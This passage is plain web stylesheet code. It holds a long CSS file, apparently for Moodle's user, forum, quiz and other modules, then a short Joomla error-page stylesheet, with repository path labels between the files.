z-index:9049; } #relatedtags-autocomplete ul { padding:0;width:100%; margin:0; list-style-type:none; } #relatedtags-autocomplete li { padding:0 5px; cursor:default; white-space: nowrap; } #relatedtags-autocomplete li.yui-ac-highlight { background:#FFFFCC; } /* autocomplete end*/ /*** *** User ***/ .userinfobox { margin-bottom:5px; border-width: 1px; border-style: solid; border-collapse: separate; } .userinfobox .left, .userinfobox .side { padding: 10px; width: 100px; vertical-align: top; } .userinfobox .userpicture { width: 100px; height: 100px; } .userinfobox .content { padding: 10px; vertical-align: top; } .userinfobox .links { width: 100px; padding: 5px; vertical-align: bottom; } .userinfobox .list td { padding: 3px; } .userinfobox .username { padding-bottom: 20px; } .userinfobox td.label { text-align:right; white-space: nowrap; vertical-align: top; } table.userinfobox { width: 80%; margin-left: 10%; margin-right: 10%; } table.groupinfobox { width: 60%; margin-left: 20%; margin-right: 20%; border-width:1px; border-style:solid; margin-bottom: 20px; } .groupinfobox .left { padding: 10px; width: 100px; vertical-align: top; } body#user-index h2 { text-align: center; } #user-view .buttons, #user-index .buttons { text-align: center; } #user-view .buttons form, #user-view .buttons form div { display:inline; } body#user-index #longtimenosee, body#user-index #showall { text-align: center; } body#user-index #showall { margin: 10px 0px; } body#user-index table#participants, body#tag-manage table#tag-management-list { margin: auto; width: 80%; } body#tag-manage table#tag-management-list td, body#tag-manage table#tag-management-list th, body#user-index table#participants td, body#user-index table#participants th { vertical-align: middle; text-align: left; padding: 4px; } body#user-index table.controls { width: 100%; } body#user-index table.controls tr { vertical-align: top; } body#user-index table.controls td.right, body#user-index table.controls td.left { padding: 4px; } body#user-index table.controls .right { text-align: right; } body#course-participation h2 { text-align:center; } body#course-participation #showall { text-align:center; margin: 10px 0px; } body#user-index .rolesform { text-align:center; } #user-policy .noticebox { text-align:center; margin-left:auto; margin-right:auto; margin-bottom:10px; width:80%; height:250px; } #user-policy #policyframe { width:100%; height:100%; } .iplookup #map { margin:auto; } .iplookup #note { text-align:center; } /*** *** Modules: general ***/ .mod_introbox { border-width:1px; border-style:solid; margin-top: 1em; margin-bottom: 1em; padding:10px; width:90%; margin-left:auto; margin-right:auto; } table.mod_index { width:90%; margin-left:auto; margin-right:auto; } /*** *** Modules: Assignment ***/ .userpicture, .picture user, .picture teacher { width:35px; height: 35px; vertical-align:top; } .modform { text-align:center; } #wordcount { text-align: right; } /*** *** Modules: Chat ***/ .nextchatsession { text-align:center; } #mod-chat-gui_header_js-jsupdate { margin:10px } #mod-chat-gui_header_js-jsupdate .chat-event, #mod-chat-gui_header_js-jsupdate .chat-message { width:100%; padding:0; margin-top:7px } #mod-chat-view #chatcurrentusers .chatuserdetails { vertical-align: middle; } #mod-chat-view #enterlink { text-align: center; margin-left: auto; margin-right: auto; width: 50%; } .chat-event .picture, .chat-message .picture { width:40px; vertical-align:top; } .chat-event .text, .chat-message .text { text-align: left; } #mod-chat-gui_basic #participants ul { margin:0px; padding:0px; list-style-type:none; } #mod-chat-gui_basic #participants ul li { display:inline; margin-right:10px; } #mod-chat-gui_basic #participants ul li .userinfo { display:inline; } #mod-chat-gui_basic #messages dl { padding:0px; margin:1px; } #mod-chat-gui_basic #messages dd, #mod-chat-gui_basic #messages dt { margin-left:0px; margin-right:5px; padding:0px; display:inline; } body.mod-chat-gui_ajax .yui-layout-doc .yui-layout-unit .yui-layout-wrap .yui-layout-hd h2 { font-size:100%; padding:0px; font-weight:normal; } /*** *** Modules: Choice ***/ .button { text-align:center; } .attemptcell { width:5px; white-space: nowrap; } .anonymous, .names { margin-left:auto; margin-right:auto; } .downloadreport { border:0px; margin-left:auto; margin-right:auto; } .choiceresponse { width:100%; } .choiceresponse .picture { width:10px; white-space: nowrap; } .choiceresponse .fullname { width:100%; white-space: nowrap; } .results.data { vertical-align:top; white-space: nowrap; } /*** *** Modules: Data ***/ .fieldadd, .sortdefault, .defaulttemplate { text-align:center; } .datapreferences { text-align:center; } table.presets { margin-left: auto; margin-right: auto; } /*** *** *** Modules: Folder ***/ #mod-folder-view .foldertree { width: 90%; margin-left: auto; margin-right: auto; } /*** *** Modules: Forum ***/ #mod-forum-view .forummode { text-align:center; } .forumheaderlist, .forumpost { border-width:1px; border-style:solid; border-collapse:separate; } .forumpost { margin-top: 15px; } .forumpost .topic { padding: 4px; border-style:solid; border-width: 0px; border-bottom-width: 1px; } .forumpost .commands { padding-top: 0.5em; text-align:right; clear: both; } .forumpost .ratings { padding-top: 1em; text-align:right; } .forumpost .attachments { padding: 7px; text-align:right; } .forumpost .content { padding: 4px; } .forumpost .footer { padding-top: 0.5em; text-align:right; } .forumpost .link { padding-top: 0.5em; text-align:right; } .forumpost .left { width: 35px; padding: 4px; text-align: center; vertical-align: top; } .mod-forum .indent { margin-left: 30px; } body#user-view .forumpost, .course .forumpost { width: 100%; } body#mod-forum-search .c0 { text-align: right; } body#mod-forum-search .introcontent { padding: 15px; } .forumolddiscuss { text-align: right; } .forumheaderlist { width: 100%; } .forumheaderlist td { border-width:1px 0px 0px 1px; border-style:solid; } .forumheaderlist .replies { text-align: center; white-space: nowrap; } .forumheaderlist .picture { width: 35px; } .forumheaderlist .discussion .starter { vertical-align: middle; } .forumheaderlist .lastpost { white-space: nowrap; text-align: right; } .forumheaderlist .discussion .author { white-space: nowrap; } .forumolddiscuss { text-align:right; } .forumaddnew, .forumnodiscuss, .noticeboxcontent { text-align:center; } #mod-forum-view .forumaddnew { margin-bottom: 20px; } #mod-forum-view .forumcontrol .groupmenu { float: left; text-align:left; white-space: nowrap; } #mod-forum-view .groupmenu { float: left; text-align:left; white-space: nowrap; } #mod-forum-view .forumcontrol .subscription { float: right; text-align:right; white-space: nowrap; } #mod-forum-view .subscription { float: right; text-align:right; white-space: nowrap; } #mod-forum-index .subscription { float: right; text-align:right; white-space: nowrap; } #mod-forum-view .unread { padding-left: 3px; padding-right: 3px; } #mod-forum-discuss .forumpost.unread .content { border-style: solid; border-width: 2px; } #mod-forum-discuss .ratingsubmit { text-align:center; padding:10px; } #mod-forum-index .unread img, #mod-forum-view .unread img { margin-left: 5px; } #mod-forum-discuss .discussioncontrols td { width: 33%; text-align:center; } #email .unsubscribelink { margin-top:20px; border-width: 0px 1px 0px 0px; border-style: solid; text-align:center; } #mod-forum-view .subscription { margin: 5px 0; } /*** *** Modules: Glossary ***/ .glossarypost .commands { width: 200px; white-space: nowrap; } #mod-glossary-comments .glossarypost, #mod-glossary-comment .glossarypost { margin-top: 15px; } .entryboxheader { border-width: 1px 1px 0px 1px; border-style: solid; } .entrybox { width: 100%; border-width: 0px 1px 1px 1px; border-style: solid; } .entrybox hr { border-left:none; border-right:none; } .glossarypost { width: 95%; border-width:1px; border-style:solid; border-collapse:separate; margin-left:auto; margin-right:auto; margin-bottom: 5px; text-align: left; } .entrylist { border-width:0px; } .entrylowersection { padding-top: 10px; } .entrylowersection table{ width: 100%; } .entrylowersection .aliases { text-align:center; } .entrylowersection .icons, .entrylowersection .ratings { text-align:right; padding-right: 5px; } .entrylowersection .ratings { padding-bottom: 2px; } .glossarycategoryheader { width: 95%; margin-left:auto; margin-right:auto; } .glossaryformatheader { width: 90%; } .glossarypost .entry { padding: 3px; } .glossarypost .picture { width: 35px; } .glossarycomment { border-width:1px; border-style:solid; border-collapse:separate; margin-bottom: 5px; text-align: left; } .glossarycomment .entry { padding: 3px; } .glossarycomment .picture { width: 35px; } .glossarycomment .icons { text-align: right; } .glossarydisplay { width: 90%; margin-left:auto; margin-right:auto; text-align:center; } .glossarydisplay .tabs { width: 100%; } .glossarydisplay .separator { width: 4px; } .glossarydisplay .tabs .selected, .glossarydisplay .tabs .inactive, .glossarydisplay .tabs .general { } .glossaryimportexport { margin-left:auto; margin-right:auto; text-align:center; } .glossarypopup { width: 95%; } .glossaryapproval { width: 100%; } .mod-glossary .glossarydisplay .tabs { margin-bottom: 0px; } .mod-glossary .glossarydisplay .tabs .side { border-style: none; border-width: 0px; width: auto; } .glossaryexplain, .glossaryaddentry { text-align: center; } .mod-glossary .tabrow0 { padding-bottom: 5px; } #mod-glossary-view .glossarycontrol { float: right; text-align:right; white-space: nowrap; margin: 5px 0; } /*** *** Modules: Journal ***/ #mod-journal-view .lastedit, #mod-journal-view .editend { margin: 5px; text-align: center; } #mod-journal-view .feedbackbox { width: 75%; border-collapse: separate; } #mod-journal-view .entrycontent { padding: 3px; } #mod-journal-view .picture { width: 35px; } #mod-journal-view .grade { text-align: right; } #mod-journal-view .info { margin-bottom: 5px; text-align: right; } /*** *** Modules: Label ***/ /*** *** Modules: Lesson ***/ #mod-lesson-lesson #page .addform { text-align: center; } #mod-lesson-edit #page .label { font-weight: bold; } #mod-lesson-edit #page .labelcorrect { text-decoration: underline; font-weight: bold; } .lessonmediafilecontrol { text-align: center; margin-left: auto; margin-right: auto; } #mod-lesson-view #content .invisiblefieldset { display: block; text-align: left; } body.jsenabled .jshidewhenenabled { display:none; } /*** *** Modules: Quiz ***/ #mod-quiz-view .quizinfo { text-align: center; } #mod-quiz-view #page .quizgradefeedback, #mod-quiz-view #page .quizattempt { text-align: center; } #mod-quiz-view #page .quizattemptsummary td p { margin-top: 0; } #mod-quiz-view .generalbox#feedback { width:70%; margin-left:auto; margin-right:auto; padding-bottom:15px; } #mod-quiz-view .generalbox#feedback h2 { margin: 0 0; } #mod-quiz-view .generalbox#feedback .overriddennotice { text-align: center; font-size: 0.7em; } #mod-quiz-view .generalbox#feedback h3 { text-align: left; } .generalbox#passwordbox { /* Should probably match .generalbox#intro above */ width:70%; margin-left:auto; margin-right:auto; } #passwordform { margin: 1em 0; } #mod-quiz-attempt .submitbtns, #mod-quiz-review .submitbtns { text-align: left; margin-top: 1.5em; } #mod-quiz-summary .submitbtns { margin-top: 1.5em; } #mod-quiz-summary #content { text-align: center; } #mod-quiz-summary .questionflag { width: 16px; height: 16px; vertical-align: middle; } #mod-quiz-attempt #quiz-timer, #mod-quiz-summary #quiz-timer { display: none; /* Revealed by JavaScript if applicable */ } #mod-quiz-summary #quiz-timer { margin-top: 1em; } #mod-quiz-attempt #quiz-time-left { font-weight: bold; } body#question-preview .quemodname, body#question-preview .controls { text-align: center; } body#question-preview .quemodname, body#question-preview .controls { text-align: center; } #mod-quiz-attempt #page .controls, #mod-quiz-summary #page .controls, #mod-quiz-review #page .controls { text-align: center; margin: 8px auto; } #mod-quiz-review .pagingbar { margin: 1.5em auto; } #mod-quiz-review .pagingbar { margin: 1.5em auto; } table.quizreviewsummary { width: 100%; } table.quizreviewsummary tr { } table.quizreviewsummary th.cell { padding: 1px 0.5em 1px 1em; font-weight: bold; text-align: right; width: 10em; } table.quizreviewsummary td.cell { padding: 1px 1em 1px 0.5em; text-align: left; } #mod-quiz-mod #reviewoptionshdr .fitem, #adminquizreviewoptions .group { float: left; width: 33%; clear: none; } #mod-quiz-mod #reviewoptionshdr .fitem { width: 30%; margin-left: 10px; } #mod-quiz-mod #reviewoptionshdr .fitemtitle, #adminquizreviewoptions .fitemtitle { width: 100%; font-weight: bold; text-align: left; height: 2.5em; margin-left: 0; } #mod-quiz-mod #reviewoptionshdr fieldset.fgroup { width: 100%; text-align: left; margin-left: 0; } #mod-quiz-mod #reviewoptionshdr fieldset.fgroup span, #adminquizreviewoptions span { float: left; clear: left; } #adminquizreviewoptions { margin-bottom: 0.5em; } .quizquestionlistcontrols { text-align: center; } #mod-quiz-report table#attempts, #mod-quiz-report div#commands, #mod-quiz-report table#itemanalysis { width: 80%; margin: auto; } #mod-quiz-report table.titlesleft td.c0 { font-weight: bold; } #mod-quiz-report table#attempts, #mod-quiz-report h2.main { clear: both; } #mod-quiz-report table#attempts { margin: 20px auto; } #mod-quiz-report table#attempts .header, #mod-quiz-report table#attempts .cell { padding: 4px; } #mod-quiz-report table#attempts .header .commands { display: inline; } #mod-quiz-report table#attempts .picture { width: 40px; } #mod-quiz-report table#attempts td { border-left-width: 1px; border-right-width: 1px; border-left-style: solid; border-right-style: solid; vertical-align: middle; } #mod-quiz-report table#attempts .header { text-align: left; } #mod-quiz-report table#attempts .picture { text-align: center !important; } #mod-quiz-report .controls { text-align: center; } #mod-quiz-report table#itemanalysis { margin: 20px auto; } #mod-quiz-report table#itemanalysis .header, #mod-quiz-report table#itemanalysis .cell { padding: 4px; } #mod-quiz-report table#itemanalysis .header .commands { display: inline; } #mod-quiz-report table#itemanalysis td { border-width: 1px; border-style: solid; } #mod-quiz-report table#itemanalysis .header { text-align: left; } #mod-quiz-report table .numcol { text-align: center; vertical-align : middle !important; } #mod-quiz-report table#itemanalysis .uncorrect { color: red; } #mod-quiz-report table#itemanalysis .correct { color: blue; font-weight : bold; } #mod-quiz-report table#itemanalysis .partialcorrect { color: green !important; } #mod-quiz-report table#itemanalysis .qname { color: green !important; } /* manual grading */ #mod-quiz-grading table#grading { width: 80%; margin: auto; } #mod-quiz-grading table#grading { margin: 20px auto; } #mod-quiz-grading table#grading .header, #mod-quiz-grading table#grading .cell { padding: 4px; } #mod-quiz-grading table#grading .header .commands { display: inline; } #mod-quiz-grading table#grading .picture { width: 40px; } #mod-quiz-grading table#grading td { border-left-width: 1px; border-right-width: 1px; border-left-style: solid; border-right-style: solid; vertical-align: bottom; } .mod-quiz .gradingdetails { font-size: small; } .quizattemptcounts { clear : left; text-align: center; margin: 6px 0; } #quiznavigation .qnbutton { display: block; float: left; width: 1.5em; height: 1.5em; overflow: hidden; margin: 0.3em 0.3em 0.3em 0; padding: 0; border: 1px solid #bbb; background: #eee no-repeat top right; text-align: center; vertical-align: middle; cursor: pointer; white-space: normal; } #quiznavigation #user-picture { margin: 0.5em 0; } #quiznavigation #user-picture img { width: auto; height: auto; float: left; } #quiznavigation .othernav { clear: both; } #quiznavigation .othernav a, #quiznavigation .othernav input { display: block; margin: 0.5em 0; } #quiznojswarning { font-size: 0.7em; line-height: 1.1; } .jsenabled #quiznojswarning { display: none; } .mod-quiz div.tabtree a span img.iconsmall { vertical-align: baseline; } #mod-quiz-edit div.sideblock{ float:right; width:30%; right:0.3em; padding-bottom:0.5em; display:block; } #mod-quiz-edit div.quizcontents{ float:left; width:70%; display:block; } #mod-quiz-edit div.quizwhenbankcollapsed{ width:100%; } #mod-quiz-edit div.quizcontents,h2.main{ clear:left; } #mod-quiz-edit .addpage{ clear:both; padding-top:0.3em; float:right; margin-right:2em; } #mod-quiz-edit h2.main{ display:inline; padding-right:1em; } #mod-quiz-edit .statusdisplay { clear: both; margin: 0.3em 1em 0.3em 0; padding: 1px ; /* Stop margin collapse. */ } #mod-quiz-edit .statusdisplay p { margin: 0.4em; } #mod-quiz-edit div.quizpage{ display:block; clear:both; width:100%; } #mod-quiz-edit div.quizpage span.pagetitle{ margin-top:0.3em; float:left; display:block; } #mod-quiz-edit div.reorder .reordercontrols .moveselectedonpage{ clear:right; float:right; padding:0.5em 0.3em; } #mod-quiz-edit div.reorder .reordercontrols .addnewpagesafterselected,#mod-quiz-edit .repaginatecommand{ float:right; clear:right; padding-right:1em; } #mod-quiz-edit div.reorder .reordercontrols .deleteselected{ float:right; margin-right:1em; } #mod-quiz-edit div.reorder .reordercontrols{ clear:both; padding-right:1em; margin-top:0.5em; padding-top:0.5em; padding-bottom:0.5em; } #mod-quiz-edit div.quizpage .pagecontent{ margin-top:0.3em; display:block; float:left; position:relative; margin-left:0.3em; margin-bottom:0.2em; border-left:solid #777 thin; line-height:1.3em; -webkit-border-radius:0.6em; -webkit-border-radius-bottomleft:0; -webkit-border-radius-topleft:0; border-radius:0.6em; border-radius-bottomleft:0; border-radius-topleft:0; width:88%; padding:0.15em 0 0.3em; } #mod-quiz-edit div.question{ clear:left; width:100%; } #mod-quiz-edit div.question div.qnum{ display:block; float:left; width:1.4em; padding-right:0.3em; padding-left:0; z-index:99; } #mod-quiz-edit div.reorder div.question div.qnum{ width:2.9em; padding-top:0.1em; } /*edit tab*/ #mod-quiz-edit div.editq div.question div.qnum{ padding-top:0.2em; } #mod-quiz-edit div.editq div.question{ padding-top:0.3em; } #mod-quiz-edit div.reorder div.question{ padding-top:0.2em; } #mod-quiz-edit div.question div.questioncontainer{ background-color:#ffc; } #mod-quiz-edit div.editq div.question div.content{ width:87%; float:left; position:relative; -webkit-border-radius:0.6em; -webkit-border-radius-bottomleft:0; -webkit-border-radius-topleft:0; border-radius:0.6em; border-radius-bottomleft:0; border-radius-topleft:0; line-height:1.4em; padding:0.5em; } #mod-quiz-edit .reorder div.question div.content{ width:87%; float:left; position:relative; -webkit-border-radius:0.3em; -webkit-border-radius-bottomleft:0; -webkit-border-radius-topleft:0; border-radius:0.3em; border-radius-bottomleft:0; border-radius-topleft:0; line-height:1.2em; padding:0.1em; } #mod-quiz-edit div.question div.content div.points{ top:0.5em; border-left:#FFF solid 0.4em; width:8.5em; padding:0.2em; } #mod-quiz-edit div.question div.content div.points input{ width:2em; padding:0; } #mod-quiz-edit div.question div.content div.points input.pointssubmitbutton{ width:auto; } #mod-quiz-edit .questionbankwindow select#catmenu_jump{ /* In Opera9, IE6 the width of the select obeys the width of its content by default. This prevents that. */ width:100%; } #mod-quiz-edit .collapsed .container{ display: none; } #mod-quiz-edit .collapsed .container{ display: none; } #mod-quiz-edit .questionbankwindow #showbankcmd{ display:none; } #mod-quiz-edit .collapsed #showbankcmd{ display:inline; } #mod-quiz-edit .questionbankwindow #hidebankcmd{ display:inline; } #mod-quiz-edit .collapsed #hidebankcmd{ display:none; } #mod-quiz-edit .questionbankwindow div.header{ padding-top:0.2em; } #randomquestiondialog_c select{ width:100%; } #mod-quiz-edit div.question div.content div.points, #mod-quiz-edit div.question div.content div.qorder{ line-height:1em; max-width:30%; position:absolute; right:50px; -webkit-border-radius:0.2em; -webkit-border-radius-bottomleft:0; -webkit-border-radius-topleft:0; border-radius:0.2em; border-radius-bottomleft:0; border-radius-topleft:0; z-index:900; display:block; margin:0; } #mod-quiz-edit div.question div.content .editicon{ width:15px; } #mod-quiz-edit .editq div.questioncontentcontainer div.singlequestion img{ float:left; padding-top:0.3em; padding-right:0.3em; } #categoryquestions .header { text-align: center; padding: 0 2px; } #categoryquestions th.modifiername .sorters, #categoryquestions th.creatorname .sorters { font-weight: normal; font-size: 0.8em; } #mod-quiz-edit div.question div.content .questionname, #categoryquestions .questionname{ white-space:nowrap; overflow:hidden; zoom:1; position:relative; max-width:20%; } #mod-quiz-edit div.question div.content .singlequestion .questionname, #mod-quiz-edit div.question div.content .singlequestion .questiontext{ display:inline-block; } #mod-quiz-edit div.editq div.question div.content .singlequestion a .questionname, #mod-quiz-edit div.editq div.question div.content .singlequestion a .questiontext{ float:left; } #mod-quiz-edit .quizquestionlistcontrols{ display:inline; } #mod-quiz-edit div.question div.content .questiontext, #categoryquestions .questiontext{ -o-text-overflow:ellipsis; text-overflow:ellipsis; position:relative; zoom:1; padding-left:0.3em; max-width:40%; overflow:hidden; white-space:nowrap; text-overflow:ellipsis; } #mod-quiz-edit div.editq div.question div.description div.content .questiontext { max-width: 75%; } #mod-quiz-edit div.quizpage .pagecontent .pagestatus{ -webkit-border-radius-bottomright:0.3em; -webkit-border-radius-topright:0.3em; border-radius-bottomright:0.3em; border-radius-topright:0.3em; margin:0.3em; padding:0.1em 0.1em 0.1em 0.3em; } #mod-quiz-edit div.question div.content .questiontype{ display:block; clear:left; float:left; } #mod-quiz-edit div.question div.content .questionpreview{ display:block; float:left; margin-left:0.3em; padding-left:0.2em; padding-right:0.2em; } #mod-quiz-edit div.question div.content div.quiz_randomquestion .questionpreview{ display:inline; float:none; } #mod-quiz-edit div.question div.content div.questioncontrols{ float:right; width:45px; position:absolute; right:0.3em; top:0; z-index:900; display:block; padding:0.2em; } #mod-quiz-edit div.question div.content div.questioncontrols img.upwithoutdown{ padding-right:12px; display:inline; } #mod-quiz-edit .quizpagedelete{ position:absolute; top:0.2em; right:0.2em; display:inline; z-index:900; } #mod-quiz-edit .quizpagedelete img { background-color:#d6d6d6; padding:0.6em; } #mod-quiz-edit .pagecontrols { clear:both; margin-left:0.5em; padding-top:0.5em; } #mod-quiz-edit .pagecontrols .singlebutton { float:left; margin-left: 1em; } #mod-quiz-edit .pagecontrols .helplink { float:left; } #mod-quiz-edit div.quizpage .pagecontent form.randomquestionform div{ /* it is a mystery why this has to be inline-table but otherwise the layout gets screwed, even if it is "inline" */ display: inline-table; } #mod-quiz-edit div.quizpage .pagecontent form.randomquestionform div input{ display: inline; } /* a CSS class YUI container creates on the fly: */ #mod-quiz-edit div#randomquestiondialog_c{ width:90%; } #mod-quiz-edit div#randomquestiondialog_c .mform, #mod-quiz-edit div#repaginatedialog .mform{ margin-left:auto; margin-right:auto; } #mod-quiz-edit div.container div.generalbox{ position:relative; display:block; border:0 none; margin:0; padding:0; } #mod-quiz-edit .questioncontentcontainer div.randomquestionqlist{ padding-left:0.2em; padding-right:0.2em; clear:both; margin:0.5em; margin-top:0.8em; } #mod-quiz-edit .questioncontentcontainer div.randomquestionqlist .totalquestionsinrandomqcategory{ overflow:auto; white-space:normal; } #mod-quiz-edit .questioncontentcontainer div.randomquestionqlist ul{ list-style-type:none; margin:0; padding:0; } #mod-quiz-edit .reorder .questioncontentcontainer .quiz_randomquestion{ position:relative; } #mod-quiz-edit .reorder div.question div.content div.quiz_randomquestion{ line-height:1em; } #mod-quiz-edit .reorder .questioncontentcontainer .randomquestioncategory label{ max-width: 25%; overflow:hidden; padding-left:0.3em; white-space:nowrap; display:inline-block; } #mod-quiz-edit .reorder .questioncontentcontainer .randomquestionfromcategory label{ overflow:hidden; white-space:nowrap; display:inline-block; } #mod-quiz-edit .editq div.question div.content .randomquestioncategory{ margin-top:0.4em; position:relative; display:inline-block; } #mod-quiz-edit .editq div.question div.content .randomquestioncategory a{ display:block; max-width:15em; overflow: hidden; text-overflow:ellipsis; -o-text-overflow:ellipsis; white-space: nowrap; float:left; position:relative; } #mod-quiz-edit .editq div.question div.content .questionpreview{ float:left; } #mod-quiz-edit .editq div.question div.content .questionpreview a{ font-weight:normal; margin-left:0em; display:inline; float:none; } #mod-quiz-edit .editq div.question div.content .randomquestioncategory .questionpreview img{ padding-right:0.3em; } #mod-quiz-edit .questioncontentcontainer div.randomquestionqlist ul li img{ padding-right:0.3em; } #mod-quiz-edit .reorder .questioncontentcontainer .randomquestioncategory, #mod-quiz-edit .reorder .questioncontentcontainer .randomquestionfromcategory, #mod-quiz-edit .reorder div.question div.content .questionpreview{ display:inline; float:none; } #mod-quiz-edit .reorder .questioncontentcontainer{ position:relative; overflow:hidden; white-space:nowrap; } #mod-quiz-edit .reorder .questioncontentcontainer .randomquestioncategory{ overflow:hidden; white-space:nowrap; } #mod-quiz-edit .reorder fieldset{ display:inline; } #mod-quiz-edit .questioncontentcontainer div.randomquestionqlist ul li{ clear:left; width:100%; overflow:hidden; white-space:nowrap; } #mod-quiz-edit .questioncontentcontainer div.randomquestionqlist ul li span{ display:inline; } /*start question bank*/ .questionbankwindow .choosecategory, .questionbankwindow .createnewquestion { padding: 0.3em; } .questionbankwindow .createnewquestion .singlebutton { display: inline; } .questionbankwindow #catmenu_jump { display: block; } #mod-quiz-edit .questionbankwindow .createnewquestion select, #mod-quiz-edit .questionbankwindow #catmenu select, #mod-quiz-edit .questionbankwindow #menucategory { width: 100%; } table#categoryquestions { width: 100%; overflow: hidden; table-layout: fixed; } table#categoryquestions td,#mod-quiz-edit table#categoryquestions th{ overflow:hidden; white-space:nowrap; } #categoryquestions .iconcol { width: 15px; text-align: center; padding: 0; } #categoryquestions .checkbox { width: 19px; text-align: center; padding: 0; } #categoryquestions .qtype { text-align: center; } #categoryquestions .qtype { width: 24px; padding: 0; } #categoryquestions .questiontext p { margin: 0; } .categoryinfo { padding: 0.3em; } #mod-quiz-edit .paging{ margin-top:0; margin-bottom:0; display:block; } #mod-quiz-edit .pagingbottom{ padding-bottom:0.3em; } #mod-quiz-edit div.questionbank form .invisiblefieldset{ clear:both; } #mod-quiz-edit .sideblock .content{ padding:0; } #mod-quiz-edit .questionbank .categorysortopotionscontainer{ padding-top:0.5em; margin-top:0.3em; } .questionbank div.categoryquestionscontainer, .questionbank .categorysortopotionscontainer, .questionbank .categorypagingbarcontainer, .questionbank .categoryselectallcontainer{ padding-left:0.3em; padding-right:0.3em; } .noquestionsincategory{ clear:both; padding-top:1em; padding-bottom:1em; } .modulespecificbuttonscontainer{ padding-left:0.3em; padding-right:0.3em; } #mod-quiz-edit div#footer{ clear:both; padding-top:1em; } /* these will toggle if js is enabled */ body #quizcontentsblock #repaginatedialog{ display: none; } body.jsenabled #quizcontentsblock #repaginatedialog{ display: block; } body.jsenabled #quizcontentsblock #repaginatedialog .hd{ display:block; } body.jsenabled #quizcontentsblock #repaginatedialog .bd{ padding:1em; } body.jsenabled #quizcontentsblock .repaginatecommand #repaginatecommand{ display:block; } /*** *** Modules: Resource ***/ #mod-resource-view .resourcecontent { text-align:center; margin:20px; } #mod-resource-view .resourcepdf { width: 100%; padding-top: 15px; text-align: center } .resourcecontent object { height:480px; width:600px; } .resourcepdf object{ height: 800px; width: 800px; } .mod-resource .modified { text-align:center; } .mod-resource .popupnotice { text-align:center; margin:40px; } #mod-resource-view div#footer { margin-top: 5px; } /*** *** Modules: Scorm ***/ /*** *** Modules: Survey ***/ .resultgraph { text-align:center; border:1px solid; } .reportsummary, .studentreport, .reportbuttons { text-align:center; } .centerpara { text-align:center; } .fullnamecell { width:10%; vertical-align:top; white-space: nowrap; } .questiontext { font-size:1em; } .smalltext { font-size: 0.75em; } #surveyform th { font-weight: normal; text-align: left; } #surveyform th.hresponse { text-align: center; width: 9%; } .rblock label { display: block; text-align: center; } .foundthat, .preferthat { white-space: nowrap; } .qnummiddlecell { vertical-align:middle; } .optioncell { width: 50%; vertical-align: top; } .buttoncell { width:5%; } .questioncell { width:50%; vertical-align:top; } .whitecell { background-color:white; } /*** *** Modules: Wiki ***/ .sideblockheading, .howtowiki { text-align:right; } .wikisearchform, .wikilinksblock, wikiadminactions { text-align:center; } .wikilinkright{ text-align:right; padding-bottom: 0.5em; } .wikiexportbox{ margin-left:auto; margin-right:auto; } /*** *** Modules: Workshop ***/ .redfont { color: red; } .workshopuploadform, .workshopkey { text-align:center; } /*** *** Help files (/lang/-/help) ***/ #help hr { border: none; height: 1px; background: #ccc; } #help .example1 { color: #a00; } #help .success { color: #080; } #help .center { text-align: center; } #help .moreinfo { text-align: right; } /* Equivalent to 1 and 5 nested blockquotes respectively. */ #help .indent { margin-left: 40px; } #help .indent-big { margin-left: 160px; margin-right:160px; } #help pre, #help code { background: #eee; border: 1px dashed #ddd; padding: 3px; } #help #emoticons{ text-align: center;clear:both;width: 300px;margin-right: auto; margin-left:auto; } #help #emoticons ul{ list-style-type: none; } #help #emoticons li{ margin-bottom: 3px; width: 120px; border-left: 3px solid gray; padding-left: 7px; float: left; } /** * comments 2.0 * */ .comment-ctrl { max-width: 200px; font-size: 12px; display: none; margin:0; padding:0; } .comment-ctrl h5 { margin:0; padding: 5px; } .comment-area { padding: 5px; } .comment-area .bd { } .comment-area textarea { width:100%; border: 1px solid grey; overflow:auto; } .comment-area .fd { text-align:right; } .comment-meta span { color:grey; } .comment-list-wrapper { } .comment-list { /*height: 150px;*/ font-size: 11px; overflow:auto; list-style:none; padding:0; margin:0; } .comment-list li { margin: 2px; margin-bottom:5px; clear:both; } .comment-paging{ /*background: #d8d8da;*/ text-align:center; } .comment-paging .pageno{ padding: 2px; } .comment-userpicture { width: 20px; float:left; } .comment-content{ margin-left: 22px; } .comment-content div{ margin:0; padding:0; } .comment-content p{ padding:0; margin:0 18px 0 0; } .comment-delete{ float:right; text-align:right; } .comment-container { float:left; width: 305px; margin: 4px; }
templates/system/css/error.css
worldwideinterweb/joomla-cms
/** * @version $Id$ * @copyright Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ /* Start Common Styles */ * { font-family: helvetica, arial, sans-serif; font-size: 11px; color: #5F6565; } html { height: 100%; margin-bottom: 1px; } body { margin: 0px; padding: 0px; height: 100%; margin-bottom: 1px; background: #FFFFFF; font-family: helvetica, arial, sans-serif; font-weight: normal; padding-top: 0px; margin-top: 0px; } .error { margin-left: auto; margin-right: auto; } table, td, th, div, pre, blockquote, ul, ol, dl, address,.componentheading,.contentheading,.contentpagetitle,.sectiontableheader,.newsfeedheading { font-family: helvetica, arial, sans-serif; font-weight: normal; } #outline { width: 900px; margin: 0 auto; padding: 0px; padding-top: 60px; padding-bottom: 60px; background: #FFFFFF; } #errorboxoutline { width: 900px; margin: 0px; padding: 0px; border: 1px solid #000000; } #errorboxheader { width: 900px; margin: 0px; padding: 0px; background: #E44249; color: #FFFFFF; font-weight: bold; font-size: 12px; line-height: 22px; text-align: center; border-bottom: 1px solid #000000; } #errorboxbody { margin: 0px; padding: 10px; text-align: left; } #techinfo { margin: 10px; padding: 10px; text-align: left; border: 1px solid #CCCCCC; color: #CCCCCC; } #techinfo p { color: #CCCCCC; }
DOC/class-svgCanvas.html
CodingFree/SVG
